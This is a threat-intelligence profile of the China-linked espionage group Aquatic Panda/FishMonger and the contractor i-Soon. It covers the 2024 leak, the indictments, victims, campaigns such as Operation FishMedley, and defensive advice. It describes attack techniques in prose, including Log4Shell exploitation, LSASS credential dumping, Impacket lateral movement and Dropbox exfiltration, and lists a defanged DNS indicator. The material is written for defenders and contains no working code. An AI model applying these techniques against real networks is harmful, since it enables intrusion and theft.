What is Aquatic Panda / FishMonger?

Aquatic Panda (also tracked as FishMonger by ESET, Earth Lusca by Trend Micro, Charcoal Typhoon / CHROMIUM by Microsoft, Bronze University by CrowdStrike, and RedHotel by Recorded Future) is the espionage arm of i-Soon (Anxun Information Technology Co., Ltd.), a private cybersecurity contractor based in Chengdu, China. The group operates within the Winnti Group umbrella and conducted global espionage against governments, dissidents, religious organizations, and news media from at least 2016 through 2023. The DOJ indicted eight i-Soon employees including CEO Wu Haibo and COO Chen Cheng in March 2025. The FBI added them to its Cyber Most Wanted list. MITRE ATT&CK tracks this group as G0135.

What was the i-Soon leak?

On February 21, 2024, TeamT5 discovered a GitHub link containing an extensive leak of internal i-Soon documents including contracts, target lists, product catalogs, and operational communications. The leak revealed i-Soon as a major component of China's contractor-driven espionage apparatus — working with at least 43 MSS and MPS bureaus across 31 provinces, charging $10,000 to $75,000 per compromised email inbox. The BBC and NHK independently authenticated the documents. When NHK reporters visited i-Soon's office, they found it empty.

What malware does Aquatic Panda use?

Aquatic Panda's toolset includes ShadowPad (modular backdoor shared across Winnti Group), SodaMaster (backdoor, initially associated with APT10), Spyder (backdoor), RPipeCommander (custom named-pipe reverse shell), ScatterBee (loader delivering the implants), FunnySwitch, SprySOCKS, BIOPASS RAT, and Cobalt Strike BEACON. For lateral movement, the group uses Impacket (for SMB/Kerberos-based lateral movement, remote command execution, and credential extraction) and fscan and NetBIOS scanners for network discovery. Data is exfiltrated via a Dropbox API tool. In the 2021 Log4Shell campaign, a modified version of a public Log4j exploit was used against VMware Horizon.

aquatic-panda

Aquatic Panda

Q: Who are Yin Kecheng and Zhou Shuai — are they i-Soon employees?

Yin Kecheng and Zhou Shuai are NOT i-Soon employees. They were charged in separate DOJ indictments as members of APT27 (also tracked as Silk Typhoon, Emissary Panda, Lucky Mouse, Iron Tiger). They are freelance hackers and data brokers who worked with the i-Soon ecosystem: Zhou Shuai brokered the sale of Yin Kecheng's stolen data through i-Soon to Chinese government clients. Yin Kecheng was sanctioned for his role in the 2024 U.S. Treasury breach. The State Department offered $2 million rewards for information leading to each man's arrest. Both remain at large in China.

Q: What is Operation FishMedley?

Operation FishMedley is the name ESET Research gave to a 10-month global espionage campaign conducted by FishMonger/Aquatic Panda from January to October 2022. It targeted seven confirmed victims: governmental organizations in Taiwan and Thailand, Catholic charities in Hungary and the United States, an NGO in the United States, a geopolitical think tank in France, and an unknown organization in Turkey. The campaign deployed ScatterBee loader delivering ShadowPad, Spyder, SodaMaster, and RPipeCommander (a novel reverse shell). ESET independently confirmed FishMonger's i-Soon affiliation through this investigation.

also known as: FishMonger Earth Lusca TAG-22 Red Dev 10 Bronze University Charcoal Typhoon CHROMIUM RedHotel i-Soon (operator)

A Chinese espionage actor operating under the Winnti Group umbrella and tied to i-Soon, the Chengdu-based MSS contractor exposed in a 2024 GitHub leak that revealed the scale of China's contractor-driven hacking apparatus. In March 2025, the FBI added named i-Soon employees to its Most Wanted list following DOJ indictments covering hacking campaigns from 2016 to 2023. i-Soon worked with at least 43 different MSS and MPS bureaus — charging between $10,000 and $75,000 per successfully compromised email inbox — and targeted governments, dissidents, religious organizations, and news outlets worldwide.

attributed origin China — Chengdu, Sichuan

operator i-Soon (Anxun Information Technology Co., Ltd.)

sponsor MSS + MPS (43 bureaus; 31 provinces confirmed)

legal status DOJ indicted 8 employees + 2 MPS officers — March 2025

first observed ~2016 (i-Soon ops); 2019 (FishMonger tracking)

notable actions 2024 US Treasury breach (Yin Kecheng / i-Soon VPS)

umbrella group Winnti Group (APT41 / BARIUM ecosystem)

target regions Asia, Europe, USA — globally indiscriminate

reward offered $10M (i-Soon info) / $2M (Yin Kecheng arrest)

Overview

Aquatic Panda — tracked as FishMonger by ESET, Earth Lusca by Trend Micro, and Bronze University by SecureWorks — is the espionage arm of i-Soon (formally Anxun Information Technology Co., Ltd.), a private cybersecurity contractor based in Chengdu, China. The group operates within the broader Winnti Group ecosystem, sharing tools, infrastructure, and operational tradecraft with threat clusters that include APT41. Until 2024, Aquatic Panda was understood primarily as a competent but not uniquely exceptional Chinese espionage actor. The 2024 i-Soon document leak changed that picture entirely.

On February 21, 2024, the Taiwanese cybersecurity company TeamT5 discovered a link on GitHub containing an extensive leak of internal i-Soon documents — contracts, internal meeting records, product catalogs, target lists, and operational communications. The leaked material revealed i-Soon as a cornerstone of China's contractor-driven hacking apparatus: a company that had generated tens of millions of dollars in revenue by selling stolen data and offensive cyber services to at least 43 different bureaus of China's Ministry of State Security (MSS) and Ministry of Public Security (MPS) across 31 provinces. The BBC and NHK both independently authenticated the documents. When NHK reporters visited i-Soon's office to investigate, they found it empty.

The leaked documents provided an unprecedented window into how China uses private companies to conduct state-directed espionage while maintaining plausible deniability. i-Soon's business model was explicitly transactional: in some cases, the MSS or MPS would direct i-Soon to hack specific targets; in others, i-Soon would hack targets speculatively and then sell the resulting data to whichever government bureau was interested. The company charged between $10,000 and $75,000 per successfully compromised email inbox. It also sold a range of offensive cyber products — including an "Automated Penetration Testing Platform," a tool capable of compromising Twitter/X accounts and bypassing multi-factor authentication, and what it called a "zero-day vulnerability arsenal." It trained MPS employees to conduct their own hacking operations independently.

On March 5, 2025, the U.S. Department of Justice unsealed indictments charging eight i-Soon employees — including its CEO Wu Haibo and COO Chen Cheng — and two MPS officers for hacking campaigns spanning 2016 to 2023. On the same date, two separate indictments were unsealed charging Yin Kecheng and Zhou Shuai as members of APT27 (also tracked as Silk Typhoon, Emissary Panda, Lucky Mouse, Iron Tiger). Yin and Zhou are not i-Soon employees — they are APT27 freelance hackers who worked with i-Soon's ecosystem: Zhou Shuai brokered the sale of Yin Kecheng's stolen data through i-Soon to Chinese government clients. The FBI added individuals from both indictments to its Cyber Most Wanted list. The Department of State offered rewards of up to $10 million for information on i-Soon personnel and up to $2 million each for information leading to the arrest of Yin Kecheng and Zhou Shuai. The DOJ simultaneously seized four domains — some linked to i-Soon and some to the APT27 actors. China's embassy denied all involvement.

naming note

Naming for this actor is unusually complex. The FBI uses "Aquatic Panda" (a CrowdStrike designation) for the full i-Soon operation. ESET uses "FishMonger" for the specific espionage team within i-Soon. Trend Micro uses "Earth Lusca." Microsoft's Typhoon naming scheme designates this group as "Charcoal Typhoon" (formerly tracked as CHROMIUM), with AQUATIC PANDA, ControlX, RedHotel, and BRONZE UNIVERSITY listed as synonyms. CrowdStrike uses "Bronze University" for the academic-targeting cluster. All refer to the same underlying i-Soon operational team. "RedHotel" (Recorded Future) is also used. This profile uses "Aquatic Panda" as the primary name consistent with the FBI's designation.

The i-Soon Contractor Model

The i-Soon leak exposed the machinery of China's contractor-driven espionage apparatus in a level of detail that no prior indictment, hack, or intelligence disclosure had provided. Understanding Aquatic Panda requires understanding i-Soon's business model — because the two are inseparable.

Dual Revenue Streams: i-Soon operated on two parallel business tracks. On the first, it accepted directed tasking from MSS and MPS bureaus — specific hacking assignments for specific targets — and was paid upon delivery of the stolen data. On the second, it conducted speculative hacking against targets it judged to be potentially valuable, then shopped the resulting data to interested government bureaus. This second model is what the DOJ called "largely indiscriminate" and explains why i-Soon victims included targets of no apparent Chinese state interest — the company was casting a wide net and sorting by salability afterward.
43 Government Bureau Clients: i-Soon worked with at least 43 different MSS and MPS bureaus spanning 31 provinces and municipalities — essentially the entire Chinese security apparatus at the provincial and municipal level. This scale indicates that i-Soon was not a niche contractor but a major infrastructure component of China's nationwide cyber intelligence collection system.
Pricing Model: The leaked documents revealed i-Soon's rate card: $10,000 to $75,000 per successfully compromised email inbox, depending on the target's perceived value. This commodification of targeted access explains the group's broad victim profile — maximizing the per-operation revenue meant targeting as many organizations as possible across all sectors.
Product Portfolio: Beyond hacking services, i-Soon sold offensive products including an "Automated Penetration Testing Platform" capable of phishing, malware delivery, and website cloning; a "Public Opinion Guidance and Control Platform (Overseas)" that could compromise Twitter/X accounts, bypass MFA, send and delete tweets, and monitor public opinion outside China; and a "zero-day vulnerability arsenal." i-Soon also trained MPS employees to conduct hacking operations themselves.
Post-Leak Status: Despite the 2024 leak, i-Soon continued operating — with multiple subsidiaries active as of early 2025. However, the company's workforce shrank by roughly a third, it accumulated over $1 million in debt, faced dozens of lawsuits, and relocated offices. No significant new cyber activity attributed to i-Soon has been observed since early 2024.
Chengdu 404 / APT41 Connection: Internal i-Soon documents referenced Chengdu Shuangyu Technology Co. Ltd. (known as "Chengdu 404"), the company behind APT41. This confirms documented tool and infrastructure sharing between i-Soon/FishMonger and the APT41 ecosystem and explains why Aquatic Panda operates within the Winnti Group umbrella.

Target Profile

Aquatic Panda's targeting reflects the dual nature of i-Soon's operations: government-directed political intelligence collection on one hand, and speculative opportunistic targeting on the other. The result is a victim profile that spans both high-value strategic targets and organizations that happened to be accessible and potentially saleable.

Governments and Foreign Ministries: Foreign ministry servers of Taiwan, India, South Korea, and Indonesia are documented i-Soon targets from the indictment. ASEAN member state governments were targeted in the 2022 FishMedley campaign. These represent classic state-directed intelligence tasking — understanding what foreign ministries communicate about the U.S., each other, and China.
Dissidents and Chinese Government Critics: The indictment specifically identifies U.S.-based critics and dissidents of the PRC as targets. i-Soon targeted individuals who had publicly criticized the Chinese Communist Party, consistent with the MPS's domestic security mandate extended to the diaspora. This mirrors the political surveillance track seen in APT32's operations.
Religious Organizations: A large U.S.-based religious organization that sent missionaries to China and was critical of the government was a confirmed target. An organization promoting religious freedom in China was also targeted. The indictment notes that targets were selected in part because they were "threatening to the rule of the Chinese Communist Party."
NGOs and Think Tanks: Operation FishMedley (2022) targeted a geopolitical think tank in France, an NGO in the United States, and Catholic charities in Hungary and the United States. These targets reflect interest in Western policy analysis and civil society organizations that engage on China-sensitive issues.
News Organizations: Multiple U.S. news organizations were targeted, specifically those identified as propagating uncensored news to people across Asia. A Hong Kong newspaper was also a documented target. This is consistent with China's documented interest in monitoring and suppressing foreign press coverage of CCP-sensitive topics.
Technology Companies, Defense Contractors, Law Firms, and Universities: The broader i-Soon operation targeted U.S.-based technology companies, think tanks, law firms, defense contractors, local governments, healthcare systems, and universities in campaigns connected to Yin Kecheng and Zhou Shuai — the two hackers also linked to the Treasury breach. This reflects the speculative targeting model: broadly compromising high-value organization types and selling what proved to be of interest.
Academic Institutions: The December 2021 Log4Shell campaign documented by CrowdStrike targeted a large academic institution — using a modified version of the Log4j exploit against a VMware Horizon instance to attempt credential harvesting and network access.

Tactics, Techniques & Procedures

Aquatic Panda's technique footprint reflects an operator that prioritizes access and collection over technical novelty. The group reuses well-documented tools — ShadowPad, SodaMaster, Cobalt Strike — long after they have been publicly described, relying on legitimate-appearing network behavior and privileged access to evade detection rather than novel evasion techniques. The Log4Shell exploitation in December 2021 demonstrates willingness to rapidly integrate widely available exploit code.

mitre id	technique	description
T1190	Exploit Public-Facing Application	CVE-2021-44228 (Log4Shell — Apache Log4j RCE, CVSS 10.0) was exploited by Aquatic Panda in December 2021 against a large academic institution, targeting a VMware Horizon Tomcat web server running the vulnerable Log4j library. CrowdStrike OverWatch detected the intrusion via DNS lookups for a subdomain under dns[.]1433[.]eu[.]org executed under the Apache Tomcat service. The group used a modified version of the Log4j exploit published on GitHub on December 13, 2021 — just days after public disclosure — demonstrating rapid integration of newly available exploit code.
T1566.001	Spear-Phishing Attachment	i-Soon's "Automated Penetration Testing Platform" included phishing email capability and file-with-malware delivery — creating attachments that, when opened, provided access to victims' computers. Spear-phishing was i-Soon's primary initial access vector for targeted government and civil society campaigns. Lures were tailored to the target's professional context — government policy documents for ministry targets, religious content for religious organization targets.
T1213	Data from Information Repositories	i-Soon specifically collected email inbox contents as its primary deliverable — charging government clients per successfully compromised inbox. Email collection from Exchange servers, government mail systems, and personal accounts was systematically conducted across all campaign types. Stolen email data was then reviewed for intelligence value and sold to the most interested MSS or MPS bureau.
T1078	Valid Accounts — Domain Administrator Credentials	In Operation FishMedley, ESET noted that in most cases operators appeared to have privileged access inside the local network — specifically, domain administrator credentials — upon arrival in the victim environment. This suggests initial access was followed by rapid privilege escalation, or that credential material was stolen in prior phases not captured in the ESET analysis. The use of domain admin credentials allowed silent lateral movement with legitimate authentication events.
T1003.001	OS Credential Dumping — LSASS Memory	ESET documented credential theft via LSASS process dumps in Operation FishMedley. At a U.S.-based NGO victim, attackers executed reconnaissance commands and extracted credential material via LSASS memory access, providing authentication material for further lateral movement. Credentials extracted in this manner can include domain user hashes, Kerberos tickets, and cached cleartext credentials.
T1021.006 / T1570	Lateral Movement — Impacket	ESET documented the use of Impacket — an open-source Python framework providing implementations of network protocols including SMB, Kerberos, and LDAP — in Operation FishMedley for lateral movement and privilege escalation. At the U.S.-based NGO victim, attackers used Impacket to escalate privileges, execute system commands remotely, and extract sensitive registry hives containing authentication data. Impacket's legitimate dual-use nature complicates detection, but its execution from unusual parent processes or against non-standard targets is a reliable behavioral indicator.
T1016	System Network Configuration Discovery	In the Log4Shell intrusion, Aquatic Panda performed network reconnaissance including DNS connectivity checks via dns[.]1433[.]eu[.]org to confirm successful exploitation. In Operation FishMedley, the fscan network scanner and a NetBIOS scanner were used for host and network discovery within victim environments after gaining initial access.
T1555	Credentials from Password Stores	A custom password exfiltration tool was documented in Operation FishMedley alongside network scanners — extracting stored credential material from victim systems post-compromise. Credential collection is a consistent operational priority, providing both lateral movement capability within the current victim and potentially reusable credentials across other targets that share authentication providers.
T1567	Exfiltration to Cloud Storage (Dropbox)	ESET documented a tool in Operation FishMedley designed to interact with Dropbox — likely used to exfiltrate collected data from victim networks through the Dropbox cloud service. Using a legitimate cloud storage provider for exfiltration blends outbound data transfers with normal enterprise cloud traffic, defeating controls focused on known-malicious C2 domains.
T1556.006	Modify Authentication Process — MFA Bypass (Twitter/X)	i-Soon's "Public Opinion Guidance and Control Platform (Overseas)" included documented capability to compromise Twitter/X accounts and bypass multi-factor authentication — accessing accounts without the victim's password, then sending tweets, deleting tweets, making comments, and monitoring content. This tool was sold to Chinese government customers to enable both surveillance of critics' accounts and the ability to manipulate public opinion outside China through a network of compromised accounts.

Known Campaigns

Hong Kong Universities — Civic Protest Surveillance 2019 – 2020

ESET's first documented FishMonger/Aquatic Panda campaign, conducted during the Hong Kong civic protests that began in June 2019. FishMonger heavily targeted universities in Hong Kong using ShadowPad and Winnti malware — initially attributed to the broader Winnti Group before ESET revised attribution specifically to FishMonger. The timing is consistent with Chinese government intelligence requirements: understanding the academic networks coordinating and participating in pro-democracy protests, identifying protest organizers and supporters, and monitoring communications about the movement. This campaign established the group's pattern of targeting institutions and individuals relevant to CCP political concerns.

Log4Shell Exploitation — Academic Institution December 2021

CrowdStrike OverWatch documented Aquatic Panda exploiting CVE-2021-44228 (Log4Shell) against a large academic institution within days of the vulnerability's public disclosure on December 9, 2021. The group targeted a VMware Horizon Tomcat web server running the vulnerable Log4j library, using a modified version of an exploit published on GitHub on December 13. The attackers performed connectivity checks via DNS lookups for dns[.]1433[.]eu[.]org running under the Apache Tomcat service, then proceeded with reconnaissance and credential harvesting post-exploitation. CrowdStrike OverWatch detected and interrupted the intrusion before it progressed to significant data collection — but the speed of exploitation, three to four days after public disclosure of a CVSS 10.0 vulnerability, demonstrated the group's active monitoring of exploit releases and ability to rapidly operationalize new attack code.

Operation FishMedley — Global Governments, NGOs, Think Tanks January – October 2022

A 10-month global espionage campaign documented by ESET spanning seven confirmed victims across Asia, Europe, and the United States. Victims included governmental organizations in Taiwan and Thailand, Catholic charities in Hungary and the United States, an NGO in the United States, a geopolitical think tank in France, and an unknown organization in Turkey. The campaign used five malware families: a ScatterBee loader dropping ShadowPad, Spyder, SodaMaster, and RPipeCommander (a previously undocumented reverse shell deployed against the Thai government organization). In most intrusions, operators appeared to have domain administrator credentials upon arrival — suggesting prior compromise or rapid privilege escalation not captured in ESET's visibility window. A Dropbox-connected exfiltration tool and custom password harvester were also deployed. ESET independently confirmed FishMonger's i-Soon affiliation through analysis corroborated by the 2024 leak. The DOJ's March 2025 indictment specifically referenced attacks consistent with the FishMedley campaign in its charges against i-Soon employees.

i-Soon Global Operations — Governments, Dissidents, Religious Organizations, Media 2016 – 2023

The full scope of i-Soon's documented operations per the DOJ indictment unsealed March 5, 2025. Eight i-Soon employees — including CEO Wu Haibo and COO Chen Cheng — and two MPS officers were charged with hacking campaigns spanning 2016 to 2023. Documented targets included: U.S.-based critics and dissidents of the PRC; a large religious organization in the United States critical of the Chinese government; an organization focused on promoting religious freedom in China; multiple U.S. news organizations propagating uncensored news to Asia; the foreign ministries of Taiwan, India, South Korea, and Indonesia; a Hong Kong newspaper; and a religious leader in an unnamed country. In addition to i-Soon's targeted political surveillance, Yin Kecheng and Zhou Shuai were separately charged with broader hacking of U.S. technology companies, think tanks, law firms, defense contractors, local governments, healthcare systems, and universities — selling stolen data through i-Soon to Chinese government clients.

U.S. Treasury Breach — Yin Kecheng / APT27 (Zhou Shuai brokered via i-Soon) September – December 2024

Yin Kecheng — an APT27-affiliated freelance hacker sanctioned by the U.S. Treasury Department's Office of Foreign Assets Control in February 2025 — was charged in connection with the breach of the U.S. Department of the Treasury that lasted from approximately September to December 2024. The virtual private servers used to conduct the Treasury intrusion belonged to an account that Yin and his co-conspirators established. Yin Kecheng and Zhou Shuai are not i-Soon employees — they were charged in separate APT27 indictments (also tracking as Silk Typhoon, Emissary Panda, Lucky Mouse). However, Zhou Shuai brokered the sale of Yin Kecheng's stolen data through i-Soon to Chinese government clients, and the VPS infrastructure used in the Treasury breach was seized alongside i-Soon's domains on March 5, 2025. The FBI seized these VPS and other infrastructure under a seizure warrant. The Treasury breach gave attackers access to Treasury workstations and unclassified documents. This operation is the most recent documented action directly linked to the broader i-Soon ecosystem — though the operators themselves are APT27 actors who worked with, rather than within, i-Soon.

Tools & Malware

Aquatic Panda's toolset combines Winnti Group-shared implants with commodity frameworks and i-Soon-developed proprietary products. A notable operational characteristic is the group's willingness to reuse well-documented malware long after public disclosure — relying on the difficulty of detecting known-good implants behaving normally rather than on tool novelty.

ShadowPad: A modular backdoor shared across multiple Chinese APT groups within the Winnti/APT41 ecosystem and considered a successor to the PlugX family. Supports a plugin architecture for extensibility without implant replacement. Used in Operation FishMedley across multiple victim intrusions and in the 2019 Hong Kong university campaign. ShadowPad's widespread use across the Chinese APT ecosystem means its presence is indicative of Chinese state-aligned activity but not sufficient on its own for narrow attribution.
SodaMaster: A backdoor initially associated with APT10, whose presence in Operation FishMedley indicates tool sharing across Chinese APT ecosystems. ESET noted that "APT10 was the first group known to have access to SodaMaster but Operation FishMedley indicates that it may now be shared among multiple China-aligned APT groups." Provides remote access and C2 capability.
Spyder: A backdoor used by FishMonger in targeted espionage campaigns including Operation FishMedley. Part of the group's standard implant deployment alongside ShadowPad and SodaMaster.
RPipeCommander: A previously undocumented C++ reverse shell identified by ESET in the Operation FishMedley Thai government intrusion. Uses multiple threads and a named pipe interface to accept three commands: create a CMD process and bind pipes, write to an existing CMD process, and exit the CMD process. ESET analyzed only the server component; a client component for sending commands from elsewhere on the local network is assessed to exist.
ScatterBee: A loader used in Operation FishMedley to deliver ShadowPad, Spyder, SodaMaster, and RPipeCommander to victim systems. Serves as the initial staging component that drops and executes the primary implants.
FunnySwitch: A backdoor in FishMonger's documented arsenal, providing C2 capability in targeted campaigns.
SprySOCKS: A backdoor documented in FishMonger's toolset. Used alongside ShadowPad and other Winnti-lineage tools in targeted espionage operations.
BIOPASS RAT: A remote access trojan attributed to FishMonger, providing comprehensive remote access capability including file operations, screen capture, process management, and C2 communication.
Cobalt Strike BEACON: Used alongside custom backdoors in FishMonger operations. Provides flexible post-exploitation capability and is consistent with the group's broader approach of mixing custom and commodity offensive tools.
Impacket: An open-source Python framework providing implementations of network protocols (SMB, Kerberos, LDAP) documented by ESET in Operation FishMedley. Used for lateral movement, remote command execution, privilege escalation, and extraction of sensitive registry hives containing authentication data. At the U.S.-based NGO victim, Impacket was specifically used alongside LSASS process dumping to harvest credentials and move laterally with domain administrator privileges.
i-Soon Proprietary Products: The leaked documents described an "Automated Penetration Testing Platform" (phishing, malware delivery, website cloning), a "Public Opinion Guidance and Control Platform (Overseas)" (Twitter/X compromise, MFA bypass, tweet manipulation), and a "zero-day vulnerability arsenal." These commercial products were sold to MSS and MPS clients and used in i-Soon's own operations.

Indicators of Compromise

The following IOCs are drawn from ESET's Operation FishMedley analysis (March 2025), CrowdStrike's Log4Shell intrusion documentation (December 2021), and the DOJ's March 2025 indictment. Full IOC sets for FishMedley are published in ESET's GitHub repository.

warning

The March 2025 DOJ seizure of i-Soon's primary domain and VPS infrastructure significantly disrupted known Aquatic Panda operational infrastructure. Current campaigns will use new infrastructure entirely distinct from pre-2025 IOCs. Behavioral and tool-based detection (ShadowPad, ScatterBee, Dropbox exfiltration) are more reliable than infrastructure IOCs for this group going forward.

behavioral and technical indicators

cve CVE-2021-44228 — Apache Log4j RCE (Log4Shell, CVSS 10.0) — Aquatic Panda exploited via VMware Horizon Tomcat December 2021

dns pattern dns[.]1433[.]eu[.]org — DNS logging service used in Log4Shell connectivity checks; subdomain queries originating from Apache Tomcat service on VMware Horizon

tool ShadowPad implant — modular backdoor shared across Winnti Group ecosystem; presence alongside SodaMaster indicates FishMonger/China-aligned actor (tool itself insufficient for narrow attribution)

tool ScatterBee loader — drops ShadowPad, Spyder, SodaMaster, RPipeCommander; FishMedley-specific delivery mechanism

exfil Dropbox API interaction from non-user processes — tool documented in FishMedley for staging and exfiltrating collected data from victim networks

tool fscan network scanner + NetBIOS scanner — host and network discovery tools used in FishMedley post-compromise reconnaissance

infra DOJ seized i-Soon primary domain (2025); VPS infrastructure linked to Yin Kecheng seized; earlier i-Soon C2 domains documented in FBI Most Wanted advisory

Mitigation & Defense

Aquatic Panda / i-Soon is assessed as operationally degraded but not eliminated following the 2025 indictments, DOJ infrastructure seizures, and significant company disruption. Multiple i-Soon subsidiaries remained active as of early 2025. The broader contractor ecosystem that i-Soon represents — China's hacker-for-hire apparatus — remains fully operational. Organizations in sectors targeted by the confirmed i-Soon campaigns should treat this threat as ongoing.

Log4j (CVE-2021-44228) Remediation — Confirmed Gap Check: Aquatic Panda exploited Log4Shell within days of disclosure in December 2021. Any organization still running Log4j versions prior to 2.17.1 (Java 8), 2.12.4 (Java 7), or 2.3.2 (Java 6) is exposed to a documented Aquatic Panda attack technique. Conduct an authenticated vulnerability scan specifically searching for Log4j library versions in all Java-based applications, including embedded components in middleware and commercial software that may not be updated through standard OS patching. Pay particular attention to VMware Horizon, Apache Tomcat, and other Java-based application servers exposed to the internet.
Domain Administrator Credential Protection: Operation FishMedley attackers appeared to have domain administrator credentials in most victim environments — enabling silent lateral movement with legitimate authentication events. Implement tiered administration (Privileged Access Workstations), enforce strict separation between standard user and administrator accounts, monitor for anomalous use of domain admin credentials outside normal administrative patterns, and require phishing-resistant MFA on all accounts with domain administrative privilege.
ShadowPad and China-Aligned Implant Detection: ShadowPad and SodaMaster are documented Aquatic Panda tools. Deploy EDR capable of detecting ShadowPad's memory injection patterns, named pipe usage, and network communication behaviors. ShadowPad's encrypted communications and in-memory execution require behavioral detection rather than file-based signature matching — ensure your EDR has active behavioral detection rules for ShadowPad specifically. ESET's IOC repository for FishMedley contains specific hashes and indicators.
Dropbox and Cloud Storage Exfiltration Monitoring: Aquatic Panda uses Dropbox API calls for data exfiltration. Monitor for Dropbox API connections from non-user processes, unusual process ancestry for cloud storage API calls, and anomalous outbound transfer volumes to cloud storage services. DLP controls that inspect outbound cloud storage uploads should be deployed on sensitive data repositories and file servers.
Email and Communication System Monitoring: i-Soon's primary revenue model was selling compromised email inbox contents. Implement monitoring for anomalous email access patterns — login from unusual geographic locations, bulk email reads from service accounts, forwarding rule creation, and access to mailboxes by accounts without normal business need. Enable audit logging on Exchange Online or on-premises Exchange at the full audit level, forward logs to a SIEM, and create alerts for forwarding rule creation and unusual bulk access events.
Religious Organizations, NGOs, and Media — Civil Society Security: The i-Soon indictment identified religious organizations, NGOs, and news media as confirmed targets. Civil society organizations with China-sensitive work — documenting human rights abuses, supporting religious freedom, publishing uncensored news for Asian audiences — should assume they are within scope of i-Soon's successors or peer contractors. Implement phishing-resistant authentication (hardware security keys), encrypted communications for sensitive correspondence, and endpoint monitoring. Access Now's Digital Security Helpline and similar organizations provide threat-specific support for civil society groups facing nation-state threats.

analyst note

The i-Soon leak and subsequent DOJ indictments offered the clearest documented view of how China operationalizes state-directed hacking at scale: through a commercialized contractor ecosystem where private companies compete for government hacking contracts, conduct speculative intelligence collection on their own initiative, and sell the results to the highest-bidding government bureau. The leaked documents showed i-Soon employees complaining about underpayment, customers haggling over rates for email inboxes, and management navigating government clients' competing demands. This is not a shadowy intelligence service — it is a business, with all the dysfunction and financial pressure that implies. The implication for defenders is significant: unlike a tightly controlled state intelligence unit with disciplined operational security, contractor-model actors like i-Soon cast a wide net and accept higher risk of detection because the financial incentive is volume-based, not mission-specific. Victims may be compromised not because they are priority targets of the Chinese state but because they were accessible and potentially saleable. This raises the floor of who needs to defend against nation-state-affiliated actors considerably — any organization with any data that a Chinese government bureau might pay for is, in principle, within scope.

Sources & Further Reading

Attribution and references used to build this profile.

— end of profile